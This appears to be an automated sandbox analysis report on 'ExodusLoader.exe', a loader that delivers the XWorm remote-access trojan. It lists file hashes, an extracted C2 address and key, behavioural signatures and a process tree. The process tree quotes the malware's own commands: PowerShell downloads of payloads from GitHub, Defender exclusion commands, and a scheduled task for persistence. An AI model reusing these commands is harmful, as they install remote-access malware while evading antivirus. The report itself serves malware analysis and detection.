Resubmissions
07/03/2025, 23:38
250307-3m5aeazk13 10Analysis
-
max time kernel
19s -
max time network
20s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250218-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250218-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
07/03/2025, 23:38
Static task
static1
General
-
Target
ExodusLoader.exe
-
Size
89KB
-
MD5
2f3405fa61bec944ed9d869adb6a37e3
-
SHA1
4a3c839b899809ba89a99eaadecf4da6d71e8256
-
SHA256
ee854407da3d172d442c9aec8861d9e8fd4f7a5f8c4cbb785d7e55549a507234
-
SHA512
72c8309a2c439adb3790aaf7198d5cdfa5591703a039ca84982752dfc43213a94885aab5a82fc0cfd78e161a792d2c1684e0cae7e4e7d772cc98be4aabdc33c0
-
SSDEEP
1536:77fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAwWOn:X7DhdC6kzWypvaQ0FxyNTBfAg
Malware Config
Extracted
xworm
5.0
137.184.74.73:5000
Y2rnj2CSRObOXXLb
-
Install_directory
%ProgramData%
-
install_file
System.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/3236-72-0x0000000002A50000-0x0000000002A5E000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 4 IoCs
flow pid Process 8 3604 powershell.exe 11 3604 powershell.exe 21 4004 powershell.exe 22 4004 powershell.exe -
pid Process 3604 powershell.exe 4004 powershell.exe 2812 powershell.exe 1576 powershell.exe -
Downloads MZ/PE file 2 IoCs
flow pid Process 22 4004 powershell.exe 11 3604 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\Control Panel\International\Geo\Nation ExodusInject.exe -
Executes dropped EXE 3 IoCs
pid Process 3272 ExodusInject.exe 3528 Exodus.exe 3236 AggregatorHost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 10 raw.githubusercontent.com 11 raw.githubusercontent.com 22 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ExodusLoader.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2172 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4404 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3604 powershell.exe 3604 powershell.exe 4004 powershell.exe 4004 powershell.exe 2812 powershell.exe 2812 powershell.exe 1576 powershell.exe 1576 powershell.exe -
Suspicious use of AdjustPrivilegeToken 52 IoCs
description pid Process Token: SeDebugPrivilege 3604 powershell.exe Token: SeDebugPrivilege 4004 powershell.exe Token: SeDebugPrivilege 3272 ExodusInject.exe Token: SeBackupPrivilege 2160 vssvc.exe Token: SeRestorePrivilege 2160 vssvc.exe Token: SeAuditPrivilege 2160 vssvc.exe Token: SeDebugPrivilege 2812 powershell.exe Token: SeIncreaseQuotaPrivilege 2812 powershell.exe Token: SeSecurityPrivilege 2812 powershell.exe Token: SeTakeOwnershipPrivilege 2812 powershell.exe Token: SeLoadDriverPrivilege 2812 powershell.exe Token: SeSystemProfilePrivilege 2812 powershell.exe Token: SeSystemtimePrivilege 2812 powershell.exe Token: SeProfSingleProcessPrivilege 2812 powershell.exe Token: SeIncBasePriorityPrivilege 2812 powershell.exe Token: SeCreatePagefilePrivilege 2812 powershell.exe Token: SeBackupPrivilege 2812 powershell.exe Token: SeRestorePrivilege 2812 powershell.exe Token: SeShutdownPrivilege 2812 powershell.exe Token: SeDebugPrivilege 2812 powershell.exe Token: SeSystemEnvironmentPrivilege 2812 powershell.exe Token: SeRemoteShutdownPrivilege 2812 powershell.exe Token: SeUndockPrivilege 2812 powershell.exe Token: SeManageVolumePrivilege 2812 powershell.exe Token: 33 2812 powershell.exe Token: 34 2812 powershell.exe Token: 35 2812 powershell.exe Token: 36 2812 powershell.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeIncreaseQuotaPrivilege 1576 powershell.exe Token: SeSecurityPrivilege 1576 powershell.exe Token: SeTakeOwnershipPrivilege 1576 powershell.exe Token: SeLoadDriverPrivilege 1576 powershell.exe Token: SeSystemProfilePrivilege 1576 powershell.exe Token: SeSystemtimePrivilege 1576 powershell.exe Token: SeProfSingleProcessPrivilege 1576 powershell.exe Token: SeIncBasePriorityPrivilege 1576 powershell.exe Token: SeCreatePagefilePrivilege 1576 powershell.exe Token: SeBackupPrivilege 1576 powershell.exe Token: SeRestorePrivilege 1576 powershell.exe Token: SeShutdownPrivilege 1576 powershell.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeSystemEnvironmentPrivilege 1576 powershell.exe Token: SeRemoteShutdownPrivilege 1576 powershell.exe Token: SeUndockPrivilege 1576 powershell.exe Token: SeManageVolumePrivilege 1576 powershell.exe Token: 33 1576 powershell.exe Token: 34 1576 powershell.exe Token: 35 1576 powershell.exe Token: 36 1576 powershell.exe Token: SeDebugPrivilege 3236 AggregatorHost.exe Token: SeDebugPrivilege 3236 AggregatorHost.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1072 wrote to memory of 1808 1072 ExodusLoader.exe 83 PID 1072 wrote to memory of 1808 1072 ExodusLoader.exe 83 PID 1808 wrote to memory of 3604 1808 cmd.exe 84 PID 1808 wrote to memory of 3604 1808 cmd.exe 84 PID 1808 wrote to memory of 4004 1808 cmd.exe 85 PID 1808 wrote to memory of 4004 1808 cmd.exe 85 PID 1808 wrote to memory of 3272 1808 cmd.exe 90 PID 1808 wrote to memory of 3272 1808 cmd.exe 90 PID 1808 wrote to memory of 3528 1808 cmd.exe 91 PID 1808 wrote to memory of 3528 1808 cmd.exe 91 PID 3272 wrote to memory of 2812 3272 ExodusInject.exe 96 PID 3272 wrote to memory of 2812 3272 ExodusInject.exe 96 PID 3272 wrote to memory of 1576 3272 ExodusInject.exe 99 PID 3272 wrote to memory of 1576 3272 ExodusInject.exe 99 PID 3272 wrote to memory of 4400 3272 ExodusInject.exe 104 PID 3272 wrote to memory of 4400 3272 ExodusInject.exe 104 PID 4400 wrote to memory of 2172 4400 cmd.exe 106 PID 4400 wrote to memory of 2172 4400 cmd.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8B48.tmp\8B59.tmp\8B5A.bat C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Exodus.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe"C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC66D.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:2172
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"3⤵
- Executes dropped EXE
PID:3528
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
C:\Users\Admin\AppData\Roaming\AggregatorHost.exe"C:\Users\Admin\AppData\Roaming\AggregatorHost.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3236 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4404
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ed30ca9187bf5593affb3dc9276309a6
SHA1c63757897a6c43a44102b221fe8dc36355e99359
SHA25681fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122
SHA5121df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810
-
Filesize
1KB
MD592fb7b0beaaa157dcb80a4198a22ca8c
SHA1aef203c6f9e107d095f7217423b9a05c7d7ef5c1
SHA256299853c88a41d76036493faf624f3dc0b97a55922d9bc8e356e4061602c58d71
SHA5125575d75c4ca61a5f6d5da70f82cc744cc7fdb6cb1d40aca673844204097de3ed837b6013066d2a25bd385f0ccd1b63f3bd4e32018a4d50eb998c943b3d42be1b
-
Filesize
1KB
MD50c9b72a598bfedc7a5579c923f4e4655
SHA1d5a2ca87954e4c229d0f00953e34017772bfb895
SHA2561e8775bf6968b85b495bc1b9fabe7302d0273cae1b69762dc48fc441df40b2a8
SHA512389ffc0e4125829d4b4c1f1ca19ba257055cba2ff6d823680c002cf71bb204df51acb0154e612b40d8ccb3af18d88944e8159e4f4b9dcf10d383310595beb176
-
Filesize
1KB
MD5aa48d9dc018b70f8b809369223b04c30
SHA1e2cf63b9f7b3456f9b4673379723b7ada094a1cb
SHA256a048ac8756024fa6e79161629da1579ec572502eb0c9ecc2b1419856051eec4c
SHA5125008401648bf8d3788d501f61e41c72974b83fed087d8d1162cb06c4e6069899694ba58f5f76bd899d2055f06a5c255769f2183b0632fdb313b19da3588678f6
-
Filesize
491B
MD554436d8e8995d677f8732385734718bc
SHA1246137700bee34238352177b56fa1c0f674a6d0b
SHA25620c5e5f392f2ad19b9397fd074d117c87ca3da37f1151736dbd20322ea7e12c3
SHA51257ffc0f920bbaf36bbd22ea90c14670f44766e4b81509f54b1dec1be4443e51d8bf0997198de0851e1ea4993e5d786e21c9c1f7f17c792da88eb6bb4a324f448
-
Filesize
507KB
MD5470ccdab5d7da8aafc11490e4c71e612
SHA1bc540c0ba7dcb0405a7b6c775f0a1b585d51c4b3
SHA256849c0420722c1dabb927ff0ab70375bc1197ba73a7f04885460b609392bd319c
SHA5126b3a09b785c02a57f6330cd6610f8a78b1f6a1689c14a190a9af4ad4ab4666f8a77d75c4c85a3af04693effdc970440ce8d62a4132f66471aaa250f9d90f2f7b
-
Filesize
227KB
MD538b7704d2b199559ada166401f1d51c1
SHA13376eec35cd4616ba8127b976a8667e7a0aac87d
SHA256153825af8babb75361f4af359bfdd5e95cbdc7f263db5c4e70ac1da8f36bc564
SHA51207b828073c8f80c5498501c8f64decb5effa702c8bc3d60a2f7d5de36d493b469cbbf413fb0c92c0aadd6ee139bfb75f3b9e936230212d42e57d2ec5671e9b27
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
164B
MD57d650e8761e071d8969b750b25d1a622
SHA12c3367f30db576f025560fd8c33f7622870f0ce6
SHA2561e37717f0364222899d7e1d96be72d7bce1eb41f85dd727d51a253d0630f872e
SHA51299211151584568f037e99065083bfc9f0f78a2d85fb13b514438b32de9287e318b77c869f79d01b0742437c9e0cd5c474884153b1cf731e3a4dbf4d6da8fd4af